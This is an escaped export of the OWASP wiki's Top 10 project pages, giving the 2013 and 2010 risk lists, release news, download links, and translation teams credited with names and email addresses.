&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:OWASP_Top_10-2017_(en).pdf.pdf&amp;diff=235644</id>
		<title>File:OWASP Top 10-2017 (en).pdf.pdf</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:OWASP_Top_10-2017_(en).pdf.pdf&amp;diff=235644"/>
				<updated>2017-11-20T16:24:42Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;2017 Top 10&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235628</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235628"/>
				<updated>2017-11-19T23:07:58Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: updated license&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 Released==&lt;br /&gt;
The OWASP Top 10 - 2017 will be available for download on &amp;lt;span style=&amp;quot;background:yellow;&amp;quot;&amp;gt;&amp;lt;b&amp;gt;20  November, 2017&amp;lt;/b&amp;gt;&amp;lt;/span&amp;gt;. We are asking for comments to be submitted on the project's [https://github.com/OWASP/Top10/issues GitHub issues].&lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* 2017 translations are currently underway&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2017 project is sponsored by &lt;br /&gt;
&lt;br /&gt;
{{MemberLinks|link=https://www.autodesk.com|logo=Autodesk-logo.png}}&lt;br /&gt;
&lt;br /&gt;
Thanks to [https://www.aspectsecurity.com Aspect Security] for sponsoring earlier versions.&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/4.0/ Creative Commons Attribution-ShareAlike 4.0 license].&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Media:OWASP_Top_10_2017_GM_(en).pdf | OWASP Top 10 2017 GM - PDF]]&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Get Involved ==&lt;br /&gt;
* [https://github.com/OWASP/Top10/issues Top 10 Issues on GitHub](preferred)&lt;br /&gt;
* [https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Oct 2017] OWASP Top 10 2017 - RC2 Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Brianglas | Brian Glas]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 RC1 has been rejected. There will be an RC2 coming out shortly. As RC2 may have significant changes from RC1, we suggest that you wait for RC2 before continuing your translation efforts. &lt;br /&gt;
&lt;br /&gt;
If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please email owasp-topten@lists.owasp.org to let us know that you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint].  &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, 